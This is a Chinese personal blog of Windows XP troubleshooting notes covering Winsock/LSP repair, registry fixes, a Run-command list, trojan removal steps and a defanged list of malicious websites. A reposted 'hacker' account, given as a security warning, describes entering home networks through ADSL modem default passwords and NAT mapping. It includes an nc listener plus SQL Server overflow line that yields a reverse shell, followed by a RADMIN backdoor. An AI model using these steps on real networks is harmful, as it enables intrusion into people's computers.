2009年03月30日

前提:网络设置绝对正确,局域网访问网络邻居没有问题

现象:IE无法打开网页,ping 公网地址通,

PING域名,例如ping www.163.com

提示:Ping request could not find host www.163.com ,Please check the name and try again
修复顺序如下:
在其他机器上下载最新超级兔子强力修复WINSOCK2,重启,无效;
用winsockfix  ,DubaTool_RepairLSP 等工具修复无效;
卸载IP协议,重新添加,重启,无效;
卸载网卡,重装驱动…….设置IP等,重启,无效;
卸载DNS补丁KB951748,重启, 无效;
regedit 删除winsock ,winsock2,用netsh winsock reset 重建,报错提示,无效
从其他计算机注册表中导出winsock及winsock2项,导入到问题计算机,重启,OK搞定。

总结:是不是用最后一个步骤可以直接修复问题,有待证明。

 

ping www.g.cn
Ping request could not find host www.g.cn. Please check the

name and try again.
IE也无法打开网页
但是
nslookup
Default Server:  a.center-dns.jsinfo.net
Address:  218.2.135.1

> set type=a
> g.cn
Server:  a.center-dns.jsinfo.net
Address:  218.2.135.1

Non-authoritative answer:
Name:    g.cn
Addresses:  203.208.33.101, 203.208.33.100
却是正常的
直接输入203.208.33.101可以打开网页
ping 网关正常 ping dns正常 内网网站可以正常访问
在host文件里加入ip 域名对应关系,可以正常访问
怀疑是tcp/ip协议或lsp问题.重装协议,修复lsp,socket仍然无效,在网络上找到一篇文章说是DNS补丁KB951748会导致这种问题
于是卸载KB951748重起机器,系统正常

修复ie后,出现无法上网情况。问题很奇怪,ping可以ping通,但是dns无法解析。情况如下:

C:\Documents and Settings\zuyl>ping 220.181.18.165

Pinging 220.181.18.165(?) with 32 bytes of data:

或:

Pinging 220.181.18.165(2 no-…) with 32 bytes of data:

Reply from 220.181.18.165: bytes=32 time=1ms TTL=57
Reply from 220.181.18.165: bytes=32 time=2ms TTL=57
Reply from 220.181.18.165: bytes=32 time=1ms TTL=57
Reply from 220.181.18.165: bytes=32 time=1ms TTL=57

原因应该是修复时破坏了winsock2系统文件。从网上 找到lspfix。exe这个软件。

LSPFix.exe这个软件主要用来辅助修复HijackThis扫描发现的010项。
使用时,请关闭所有IE界面和文件夹界面后运行LSPFix,运行后,把要修复的那一个010项从左边转到右边,点“Finish”即可。(不过这之前,需要在“I know what I`m doing”前面打勾。)具体方法如下:

1,下载LSPFix.exe和WinsockxpFix.exe两个软件。
2,运行lspfix.exe,可以在窗口左边看到目前使用的winsock协议文件,其中就有msplus.dll
3,选中那个“I know what I am doing”,选择msplus.dll,将其移到右边窗口去。
以上就是很多网上论坛提供的解决办法。但是很多情况下你会发现,这样是没有效果的,重新启动后会发现msplus.dll还是没有被移除,也就不能被删除了。
真正的解决办法接下来要这样做:
4,发现上述办法无效时,就按3的办法,把左边窗口所有文件都移到右边去!这样msplus.dll也待不下去了!没有必要的话不要轻易将所以文件移除,这样可能造成系统无法启动。
5,重新启动,这时msplus.dll可以删除了,赶快删了它!
6,运行WinsockxpFix.exe,选择修复。
7,重新启动,发现msplus.dll已经消失,问题解决。
特别提醒:在使用LSPFix.exe进行修复前一定要下载WinsockxpFix.exe到本地,因为LSPFix.exe进行修复后不能连接网络的.
ispfix下载:http://files.cnblogs.com/myhjcqk/ispfix.rar

WinsockXPFix下载:http://files.cnblogs.com/myhjcqk/WinsockXPFix.rar

这样问题解决了。我之执行到第二步就搞定了。。。免除了重做系统之苦。。

 

如果上述方法仍无效的话,使用以下工具保证可以:

winsockfix 

DubaTool_RepairLSP

 

相关资料:

修复WINXP无法上网问题(系统winsock2损坏)
      今早同事的电脑不幸染,用卡巴杀毒后发现不能上网了。查看网络设置 IP、DNS、网关都设置正确。ping 外网的IP可以PING得通,不过回显的信息不能显示出解释出该域名的域名服务器,而是显示一个“?“号,如:
Pinging ? [192.168.10.11] with 32 bytes of data:

Reply from 192.168.10.11: bytes=32 time=138ms TTL=49
Reply from 192.168.10.11: bytes=32 time=135ms TTL=49
Reply from 192.168.10.11: bytes=32 time=136ms TTL=49
Reply from 192.168.10.11: bytes=32 time=135ms TTL=49

Ping statistics for 192.168.10.11:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 135ms, Maximum = 138ms, Average = 136ms

正常情况下,应该是这样显示的:
Pinging www.homepage.com [192.168.10.11] with 32 bytes of data:

Reply from 192.168.10.11: bytes=32 time=138ms TTL=49
Reply from 192.168.10.11: bytes=32 time=135ms TTL=49
Reply from 192.168.10.11: bytes=32 time=136ms TTL=49
Reply from 192.168.10.11: bytes=32 time=135ms TTL=49

Ping statistics for 192.168.10.11:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 135ms, Maximum = 138ms, Average = 136ms

如果ping域名的话会出现这样的错误解释:
C:\>ping www.nbip.net
Ping request could not find host www.nbip.net. Please check the name and try again.

      一直没整明白问题在哪里,后来使用超级兔子的强力修复winsock2,结果好了。原来NOD32在杀毒的时候修改了系统的winsock2接口,来达到保护系统的目的。此外如果此接口被其他程序占用,或者是winsock2占用程序丢失也导致不能上网。

      随后我在微软的网站找到《如何确定 Winsock2 是否损坏并从损坏中恢复》 ,对此有了更详细的说明

        本文介绍如何确定 Winsock2 是否损坏并从损坏中恢复。重要说明:本文包含有关如何修改注册表的信息。修改注册表之前,一定要先进行备份,并且一定要知道在发生问题时如何还原注册表。
症状
在尝试使用 Ipconfig 程序释放并更新 IP 地址时,您可能会收到以下错误信息:
An error occurred while renewing interface ‘Internet’:An operation was attempted on something that is not a socket.
当您启动 Internet Explorer 时,可能会收到以下错误信息:
该页无法显示。
在使用计算机时,可能会收到以下错误信息:
在 IPMONTR.DLL 中初始化函数 INITHELPERDLL 启动失败,错误代码为 10107
此外,您可能没有 IP 地址或自动专用 IP 寻址 (APIPA) 地址,并且可能会收到 IP 数据包,但没有发送它们。

当您使用 ipconfig /renew 命令时,可能会收到以下错误信息。

消息 1
An error occurred while renewing interface local area connection:an operation was attempted on something that is not a socket.Unable to contact driver Error code 2.
消息 2
The operation failed since no adapter is in the state permissible for this operation.
消息 3
The attempted operation is not supported for the type of object referenced.
在设备管理器中,当您单击“显示隐藏的设备”时,“非即插即用驱动程序”下面的列表中停用“TCP/IP Protocol Driver”,并收到错误代码 24。

当您创建拨号连接时,可能会收到以下错误信息:
Error 720:No PPP Control Protocols Configured

原因
如果 WinSocks 注册表项损坏,则可能出现这些问题。

解决方案
如何确定 Winsock2 注册表项是否损坏
要确定症状是否由 Winsock2 注册表项的问题引起,请使用以下方法。
方法 1:使用 Netdiag 工具
要使用 Netdiag 工具,您必须安装 Microsoft Windows XP 支持工具。为此,请按照下列步骤操作。

注意:
· 如果已经安装了支持工具,请直接执行本部分的第二步。
· 如果未安装支持工具并且没有 Windows XP 安装 CD,请转到“方法 2”。

1. 插入 Windows XP 安装 CD,然后找到 Support\Tools 文件夹。
2. 双击“Setup.exe”文件。
3. 按照屏幕上的步骤操作,直至看到“请选择安装类型”屏幕。
4. 在“请选择安装类型”屏幕上,单击“完全”,然后单击“下一步”。
安装完成后,请按照下列步骤操作:
1. 单击“开始”,单击“运行”,键入 Command,然后单击“确定”。
2. 键入 netdiag /test:winsock,然后按 Enter。
Netdiag 工具将返回若干网络组件(包括 Winsock)的测试结果。要了解该测试的更多详细信息,请在以下 netdiag 命令结尾处添加 /v:netdiag /test:winsock /v
方法 2:使用 Msinfo32 程序
注意:只有在没有 Windows XP 安装 CD 并且未安装支持工具时,才应使用此方法。
1. 单击“开始”,单击“运行”,键入“Msinfo32”,然后单击“确定”。
2. 展开“组件”,展开“网络”,然后单击“协议”。
3. “协议”下有 10 个节。如果 Winsock2 注册表项未损坏,则节标头应包含以下名称:
?MSAFD Tcpip [TCP/IP]
MSAFD Tcpip [UDP/IP]
RSVP UDP Service Provider
RSVP TCP Service Provider
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
如果名称与此列表中的内容有任何不同,则说明 Winsock2 注册表项已经损坏,或者您安装了第三方加载项(如代理服务器软件)。
如果安装了第三方加载项,则加载项的名称将替换列表中的字母“MSAFD”。

如果列表的内容超过 10 个节,则说明安装了第三方加载项。

如果少于 10 个节,则说明缺少信息。

注意:这些条目所代表的是仅装有 TCP/IP 协议的安装。您可能有一个正在工作的 Winsock,如果安装了另一个协议,则可能会看到其他条目。例如,如果安装 NWLink IPX/SPX,您将另外看到 7 个节,也就是总共 17 个节。下面的示例展示了一个新的节标头:
MSAFD nwlnkipx [IPX]
通过安装 NWLink IPX/SPX 创建的每个新节也以“MSAFD”开头。因此,仍然只有两个不以这些字母开头的节。

如果 Netdiag 测试失败,或者,如果通过查看 Msinfo32 信息确定了 Winsock 的损坏,您必须使用下一部分的步骤修复 Winsock2 注册表项。

如何恢复损坏的 Winsock2

#带 Service Pack 2 的 Windows XP
要在安装了 Windows XP Service Pack 2 (SP2) 的情况下修复 Winsock,请在命令提示符处键入 netsh winsock reset,然后按 Enter。

注意:运行此命令后请重新启动计算机。此外,对于运行 Windows XP SP2 的计算机,还有一个新的 netsh 命令可用于重新构建 Winsock 注册表项。有关更多信息,请访问下面的网站:
http://www.microsoft.com/china/technet/prodtechnol/winxppro/maintain/sp2netwk.mspx (http://www.microsoft.com/china/technet/prodtechnol/winxppro/maintain/sp2netwk.mspx)

警告:在运行 netsh winsock reset 命令时,访问或监视 Internet 的程序(如防病毒程序、防火墙或代理客户端)可能会受到不良影响。如果执行此解决方案后某个程序无法正常工作,请重新安装该程序以恢复功能。

注意:如果这些步骤都无法解决问题,请执行下一部分的步骤。

#不带 Service Pack 2 的 Windows XP
如果要在未安装 Windows XP SP2 的情况下修复 Winsock,请删除损坏的注册表项,然后重新安装 TCP/IP 协议。
第 1 步:删除损坏的注册表项
警告:如果使用注册表编辑器或其他方法错误地修改了注册表,有可能会导致严重问题。这些问题可能需要重新安装操作系统才能解决。Microsoft 不能保证可以解决这些问题。修改注册表需要您自担风险。

有关如何备份注册表的更多信息,请单击下面的文章编号,以查看 Microsoft 知识库中相应的文章:
322756 (http://support.microsoft.com/kb/322756/) 如何在 Windows XP 和 Windows Server 2003 中备份、编辑和还原注册表
1. 单击“开始”,然后单击“运行”。
2. 在“打开”框中,键入“regedit”,然后单击“确定”。
3. 在注册表编辑器中,找到以下注册表项,右键单击每一项,然后单击“删除”:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2?
4. 当提示您确认删除时,单击“是”。
注意:删除 Winsock 注册表项后请重新启动计算机。这样做可以让 Windows XP 操作系统为这两个注册表项创建新的 shell 条目。如果在删除 Winsock 注册表项后未重新启动计算机,则下一步将无法正常进行。
第 2 步:安装 TCP/IP
1. 右键单击网络连接,然后单击“属性”。
2. 单击“安装”。
3. 单击“协议”,然后单击“添加”。
4. 单击“从磁盘安装”。
5. 键入 C:\Windows\inf,然后单击“确定”。
6. 在可用协议列表中,单击“Internet 协议 (TCP/IP)”,然后单击“确定”。
7. 重新启动计算机

2008年10月10日

http://www.hopefly.com/it/regfix/

http://www.hdol.cn/iexiufu/

 

2007年06月09日

打开注册表编辑器,在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ Session Manager中找到PendingFileRenameOperations项目 ,并删除它。这样就可以清除安装暂挂项目,系统不必重新启动,改问题对解决IE,SQL SERVER等都可以解决

2007年02月16日

这是一位所谓的"黑客"的口述,你不妨看一下,也许你看完后对他的技术性做法不是完全明白,但是你肯定会感到一身冷汗,因为我们现在使用ADSL已经日益广泛,但我们的安全意识还不是很强.听完他的口述希望大家在日后能加强安全防范!

    口述:

    也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得。

    一.扫描

    现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理,但80 21端口有很多服务器都有打开,没怎么特征性,于是我选择了23端口,打开我的至爱:SUPPERSCAN,填上我所在地区的IP段,(跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了,开23的主机还真不小啊:)我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:ADSL pass:adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234)bingle 一矢中的,现在我就是上帝。

    二.映射

    入侵已经成功了一半,要进一步入侵内网,我们要进行端口映射,但是我连内网的拓扑,都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?在此,我选择了猜测。一般来说,MODEM的内网IP缺省是192.168.1.1,而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)。但是192.168.1.2到底开放了什么端口,我们根本就不知道啊,呵呵,既然不知道,那么我就把他整台主机透明地映射到外网,具体做法如下:进入NAT选项—添加NAT规则—BAMID—填入主机IP:192.168.1.2,到此192.168.1.2已经透明地映射到192.168.1.1上了,我们访问ADSL MODEM就等于访问主机192.168.1.2了

    三.检测漏洞

    现在我们再请出SUPPERSCAN对218.xxx.xxx.xxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口是139 1433等,刚才只是开放了80 23 21 而已(也就是说我们的映射已经成功了)该是X-SCAN出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低B啊。 

    四.溢出

    既然没有弱口令,也没开80,那只好从溢出方面着手了,但没开80 21 也就webdav .sevr-u的溢出没戏了,很自然,我向导了RPC溢出,但实践证明RPC溢出也是不行的,LSASS溢出也不行 。 

    五.募然回首,那人却在,灯火阑珊处

开来这管理员还是比较负责的,该打的补丁都打上了,这时侯,我的目光转移到1433上了(嘿,不知道他打了SQL补丁没有?)心动不如行动,现在只好死马当活马医了,于是
  nc -v -l 99
  sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
bingle 成功地得到一个shell了。

    六.设置后门

    到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用FTP上传RADMIN上去的,呵呵,这里不详谈了,相信各位都知道。

如今的恶意网站真是太多了,稍不小心就会中招,小编尽己所能在茫茫互联网中搜集了25个恶意网站,警示大家,但凡遇到以下网站,千万别点击哦!
警告:以下网站请勿进去!进去者自己处理。25个最恶意的中文网站,千万不要试!
(为防网友误点入,已把http:// 转换为 hxxp:///)

1、hxxp:///www.dj3344.com 打开后,重启时你的主页就变成它的,并通过 QQ 向他人传播,现在正飙行,奇坏无比!

2、hxxp:///www.qq168.net 打开后,重启时你的主页就变成它的,并通过 QQ 向他人传播,而且传波病毒,还狠些!现在正在飙行!

3、hxxp:///www.777888.com

4、hxxp:///WWW.5dsoft.com

5. hxxp:///www.wokoo.net

6. hxxp:///movie.sx.zj.cn

7. hxxp:///yeapple.com ***,打开后,你的程序中将加一些你意想不到的东西

8. hxxp:///xyxy68.8u8.net

9. hxxp:///www.youmiss.com

10. hxxp:///www.cctv8.net

11. hxxp:///www.kuliao.com

12. hxxp:///www.yyqy.com

13. hxxp:///winzheng.126.com

14. hxxp:///www.sunvod.com

15. hxxp:///www.t168.com

16. hxxp:///www.boliwo.com

17. hxxp:///www.coolcdrom.com 要特别小心这个网站,它会在你激活组里做手脚,使得重启以后标题依旧!

18. hxxp:///www.zhengdian.com OE 标题栏也没放过

19. hxxp:///girlchinese.com IE 的主页也被改了

20. hxxp:///www.yibinren.com 更可怕,把 IE 的默认页都改成他的了

21. hxxp://hxxp:///www.mtv51.com 什么雪落无声音乐网,恶性:禁止注册表修改,禁止开始菜单「运行」项。开机自动运行他的主页。

22. hxxp://www.163 [1].com 也是一个什么音乐网。症状和楼上的差不多。我上次中招后化了一个多小时才改回来!还有夹带病毒!

23. hxxp://hxxp:///www.37021.com 看清楚!不是 3721,可恶讨厌,在你的机器里到处做手脚:注册表激活计算器配置文件还有一个 dll 文件而且资源管理器无法浏览隐藏文件,这个最讨厌!

24. hxxp:///www.cnqb.net 禁止你的注册表,改首页,主页地址栏变灰,改右键,最毒!

更多列表:

hxxp://www.qq3344.com(net) 与文章中的 1、2 类似 ,这 3 个网站都有这种恶性,互相为变种。

youlove.3322.net/picture.exe 有恶意代码的特性外,还夹带病毒:Trojan.Pwdbox.d

hxxp:///www.58589.com 有恶意代码的特性外,还夹带病毒:Trojan.Tsqj.setup

tty.yyun.net 与上述的危害差不多

hxxp:///www.ftlink.net 一般性恶意代码

hxxp://><.com.tw/avnvyou520/ 一般性恶意代码

hxxp:///www.pixpox.com 恶性**网站。会加载不明插件,并且自动开启计算器后门,而且在计算器每个角落都有该网站留下的恶意程序,危害甚大!

hxxp:///www.k163.com(狩猎者变种和 DJ344、QQ3344、QQ168 是一伙的)

hxxp:///www.pk.com

hxxp:///www.xxx.com

hxxp:///204.177.92.68/rotate/r3.jhtml(去 TRY 看看,绝对让你的 IE 去回收站)

hxxp:///www.fassia.net/wmed/index1.html(上了这个以后就不要想上别的了)

hxxp:///www.ehomeday.com 搜索的时候它会给你一把哦!

hxxp:///www.jinpin.net 这个是老套的,跟以前的一样

WINDOWS XP 开始→运行→命令 集锦
winver———检查Windows版本
wmimgmt.msc—-打开windows管理体系结构(WMI)
wupdmgr——–windows更新程序
wscript——–windows脚本宿主设置
write———-写字板
winmsd———系统信息
wiaacmgr——-扫描仪和照相机向导
winchat——–XP自带局域网聊天
mem.exe——–显示内存使用情况
Msconfig.exe—系统配置实用程序
mplayer2——-简易widnows media player
mspaint——–画图板
mstsc———-远程桌面连接
mplayer2——-媒体播放机
magnify——–放大镜实用程序
mmc————打开控制台
mobsync——–同步命令
dxdiag———检查DirectX信息
drwtsn32—— 系统医生
devmgmt.msc— 设备管理器
dfrg.msc——-磁盘碎片整理程序
diskmgmt.msc—磁盘管理实用程序
dcomcnfg——-打开系统组件服务
ddeshare——-打开DDE共享设置
dvdplay——–DVD播放器
net stop messenger—–停止信使服务
net start messenger—-开始信使服务
notepad——–打开记事本
nslookup——-网络管理的工具向导
ntbackup——-系统备份和还原
narrator——-屏幕“讲述人”
ntmsmgr.msc—-移动存储管理器
ntmsoprq.msc—移动存储管理员操作请求
netstat -an—-(TC)命令检查接口
syncapp——–创建一个公文包
sysedit——–系统配置编辑器
sigverif——-文件签名验证程序
sndrec32——-录音机
shrpubw——–创建共享文件夹
secpol.msc—–本地安全策略
syskey———系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc—本地服务设置
Sndvol32——-音量控制程序
sfc.exe——–系统文件检查器
sfc /scannow—windows文件保护
tsshutdn——-60秒倒计时关机命令
tourstart——xp简介(安装完成后出现的漫游xp程序)
taskmgr——–任务管理器
eventvwr——-事件查看器
eudcedit——-造字程序
explorer——-打开资源管理器
packager——-对象包装程序
perfmon.msc—-计算机性能监测程序
progman——–程序管理器
regedit.exe—-注册表
rsop.msc——-组策略结果集
regedt32——-注册表编辑器
rononce -p —-15秒关机
regsvr32 /u *.dll—-停止dll文件运行
regsvr32 /u zipfldr.dll——取消ZIP支持
cmd.exe——–CMD命令提示符
chkdsk.exe—–Chkdsk磁盘检查
certmgr.msc—-证书管理实用程序
calc———–启动计算器
charmap——–启动字符映射表
cliconfg——-SQL SERVER 客户端网络实用程序
Clipbrd——–剪贴板查看器
conf———–启动netmeeting
compmgmt.msc—计算机管理
cleanmgr——-垃圾整理
ciadv.msc——索引服务程序
osk————打开屏幕键盘
odbcad32——-ODBC数据源管理器
oobe/msoobe /a—-检查XP是否激活
lusrmgr.msc—-本机用户和组
logoff———注销命令
iexpress——-木马捆绑工具,系统自带
Nslookup——-IP地址侦测器
fsmgmt.msc—–共享文件夹管理器
utilman——–辅助工具管理器
gpedit.msc—–组策略

2006年12月14日

更改regedit.exe 为regedit.com,然后找到\HKCR\winfiles\shell\Open\Command,将默认值改为"%1" %*

就OK,都不用重新启动计算机。

2006年10月08日

C:\Program Files\Internet Explorer
有iedw.exe和iexplore.exe

删除以后,不到1秒又自动出现。前一阶段中过winlogon.exe病毒。现在只要打开IE,就会生成以当前用户身份运行的winlogon.exe进程,我用傲游,不会生成此进程。其它一切正常。

====================以下为转载==============================
smss.exe,winlogon.exe"落雪木马专杀工具及手动清除过程
附上找到的此病毒的专杀工具。

相关介绍:
http://www.pcfix.com.cn/Article_Print.asp?ArticleID=980

直接下载此工具:
http://www.jiangmin.com/download/TrojanKiller.exe

注:手动清除时,务必把病毒生成的所有文删掉,由于具体环境的差别,病毒生成的文件可能会略有差异。比如我机子上就没有下面说的3721木马。

如何清除smss.exe病毒手动清除方法介绍(winlogon.exe清除过程类似,只是在把相关对smss.exe的操作换为对winlogon.exe的),
smss.exe病毒手动清除

SMSS病毒介绍:这是一种Windows下的PE病毒,它采用VB6编写 ,

是一个自动访问某站点(3721)的木马病毒。

该病毒会在注册表中多处添加自己的启动项,还会修改系统文件WIN.INI

,并在[WINDOWS]项中加入"RUN" = "%WINDIR%\SMSS.EXE"。

症状:确定自己中招没就看看吧!如果系统进程中出现了2个smss.exe进程,

而且其中的smss.exe路径是"WINDOWS\SMSS.EXE",那就是中了

TrojanClicker.Nogard.a病毒。 清除过程:和ROSE ADOBER这2个小垃圾不一样,

纯粹的清除其相关病毒文件,修改注册表,更改启动项是没用的,

那时在浪费时间。所以说这个木马病毒比较高级,挺麻烦。

    步骤:手动杀毒的时候先把文件夹选项搞好了再进行清除*作,

养成个好习惯。显示隐藏文件,把那个隐藏受保护的*作系统文件的勾点掉。

1.运行gpedit.msc打开组策略-计算机配置-Windows设置-安全设置-软件限制策略-

其它规则,在右边窗口空白处右键选择"新散列规则"。

这样smss.exe就不会再运行了。

2.运行Procexp.exe(没得话可以去下个,这个东东很叼,很好用),

然后结束%Windows%\SMSS.EXE进程,注意路径。

要是结束SYSTEM的SMSS会重启的,

当然也可以用ntsd命令关掉任务管理器中的smss.exe进程。

结束并防止其再次启动是SMSS.EXE病毒手动清除的关键,

ROSE等直接可以结束其进程然后删文件改注册表就行了。

如果不进行第一和第二步骤是不能清楚SMSS病毒的。

3.接下来删除下面这些文件:

C:\MSCONFIG.SYS 下面的文件名在注册表中也会出现,

忘记是哪几个了,搜索下要么修改要么删除,

呵呵,对了还有个WOW你在注册表中搜艘看是不是有好几个?

%Windows%\1.com(是不是在你注册表中发现WWW.3721.COM

哈哈知道怎么中的了吧)

%Windows%\ExERoute.exe %Windows%\explorer.com %Windows%\finder.com %

Windows%\smss.exe %Windows%\Debug\DebugProgram.exe %System%\command.pif

%System%\dxdiag.com %System%\finder.com %System%\MSCONFIG.COM %

System%\regedit.com %System%\rundll32.com %ProgramFiles%\Internet

Explorer\iexplore.com %ProgramFiles%\Common Files\iexplore.pif %Program

Files%\sfx software\svchost.exe 其它关联木马》

木马路径:C:\WINDOWS\system32\cns.exe

木马路径:C:\WINDOWS\system32\cns.dll

木马路径:C:\WINDOWS\system32\command.pif

木马路径:C:\WINDOWS\system32\MSCONFIG.COM

木马路径:C:\WINDOWS\system32\dxdiag.com

木马路径:C:\WINDOWS\system32\regedit.com

木马路径:C:\WINDOWS\system32\drivers\CnsMinKP.sys

然后到注册表中将下面的键值删除:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Torjan Program"="%Windows%\smss.exe"

(也可以直接搜索注册表的这样比较稳妥和全面一点)并修改

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]

下 "shell"="Explorer.exe 1" 为 "shell"="Explorer.exe"

以下步骤可以不进行*作的,不过最好还是扫下吧:

分别查找“command.pif”、“finder.com”、“rundll32.com”的信息,

将“command.pif”、“finder.com”、“rundll32.com”修改为“rundll32.exe”

查找“explorer.com”的信息,将“explorer.com”修改为“explorer.exe”

查找“iexplore.com”的信息,将“iexplore.com”修改为“iexplore.exe”

查找“iexplore.pif”的信息,将找到的“%ProgramFiles%\Common

Files\iexplore.pif”修改为“%ProgramFiles%\Internet Explorer\iexplore.exe”

其中可能有几个找不到,没关系,找相同时间的文件出来删之

(比如这一木马创立的时间是2006-6-18 15:51你就搜索所有6-18创建的文件,

当然,时间也要一致,可别删错了)如果没找到,那最好了,

说明他已经不存在了。SMSS.EXE病毒相关文件大小全部一样为112K,

反正我这里是这么大小,看网上其他人和我写的不一样。

搞到这里你可以用些修复软件对系统进行下恢复,当然也可以不修复的。

等等,接下来你不能运行EXE文件,你开个视频都要你打开方式的,

好下面我们修改下注册表:不要在运行中输入东西打不开的。

方法一:复制WINDOWS目录下的regedit.exe到桌面并改名为regedit.com,

然后打开regedit.com,找到下列分支:

HKEY_CLASSES_ROOT\exefile\shell\open\command,

双击右侧窗口中的 (默认) 值,设置为 "%1" %* [包含引号] 再找到:

HKEY_CLASSES_ROOT\.exe 双击右侧窗口中的 (默认) 值,

设置为 exefile 然后退出注册表编辑器,重启电脑 方

法二:复制WINDOWS\system32目录下的cmd.exe到桌面并改名为cmd.com

命令行中,依次执行以下命令: ftype exefile="%1" %* [包含引号](回车)

assoc .exe=exefile 重启电脑。 至此SMSS.EXE病毒清除成功。

SMSS病毒是利用IE漏洞传播,可能你随便开个网页都有可能中毒,防止这个病毒最好是下个补丁。